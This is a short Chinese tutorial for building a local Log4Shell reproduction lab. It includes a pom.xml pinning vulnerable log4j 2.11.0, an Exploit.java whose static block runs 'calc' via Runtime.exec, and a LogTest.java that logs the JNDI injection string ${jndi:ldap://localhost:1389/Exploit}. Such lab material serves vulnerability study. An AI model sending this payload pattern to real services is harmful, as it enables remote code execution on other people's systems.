1、首先新建一个文件夹，比如hello
Hello里新建pom.xml

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd"><modelVersion>4.0.0</modelVersion><groupId>org.springframework</groupId><artifactId>gs-maven</artifactId><packaging>jar</packaging><version>0.1.0</version><dependencies><dependency><groupId>org.apache.logging.log4j</groupId><artifactId>log4j-core</artifactId><version>2.11.0</version></dependency><dependency><groupId>org.apache.logging.log4j</groupId><artifactId>log4j-api</artifactId><version>2.11.0</version></dependency><dependency> <groupId>log4j</groupId><artifactId>log4j</artifactId><version>1.2.12</version></dependency></dependencies><build><plugins><plugin><groupId>org.apache.maven.plugins</groupId><artifactId>maven-shade-plugin</artifactId><version>2.1</version><executions><execution><phase>package</phase><goals><goal>shade</goal></goals><configuration><transformers><transformerimplementation="org.apache.maven.plugins.shade.resource.ManifestResourceTransformer"><mainClass>hello.LogTest</mainClass></transformer></transformers></configuration></execution></executions> </plugin></plugins></build>
</project>

注意上面dependencies部分用于解决程序包org.apache.logging.log4j不存在问题，即
Maven编译java及解决程序包org.apache.logging.log4j不存在问题
和文件夹src\main\java
java里新建Exploit.java和LogTest.java
Exploit.java

class Exploit{static {System.err.println("Pwned");try {String cmds = "calc";Runtime.getRuntime().exec(cmds);} catch ( Exception e ) {e.printStackTrace();}}
}

LogTest.java

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
class LogTest {public static final Logger logger = LogManager.getLogger();public static void main(String[] args) {logger.error("${jndi:ldap://localhost:1389/Exploit}");}
}

2、然后使用meve compile编译就行

生成的class在target里

另外值得注意的是编辑xml不要用记事本，会有缩进问题，建议使用vscode编辑